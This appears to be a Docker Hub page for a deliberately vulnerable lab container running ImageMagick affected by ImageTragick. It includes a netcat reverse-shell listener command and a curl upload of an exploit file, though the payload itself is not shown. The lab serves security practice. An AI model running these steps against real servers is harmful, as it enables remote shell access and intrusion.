Run a containerised Flask app that is vulnerable to the ImageTragick bug.
2.0K
Run a containerised Flask app that relies on a version of ImageMagic that is vulnerable to the ImageTragick bug.
Download this image and create a container:
$ docker run -d --name imagetragick -p 127.0.0.1:8080:8080 craighurley/docker-imagetragick
Listen for the reverse shell:
$ nc -l -n -vvv -p 4443
Edit the contents of exploit.mvg so that it uses the correct IP address that nc is listening on.
Upload exploit to vulnerable application:
$ curl -v -F [email protected] http://127.0.0.1:8080
Content type
Image
Digest
Size
141 MB
Last updated
over 10 years ago
docker pull craighurley/docker-imagetragick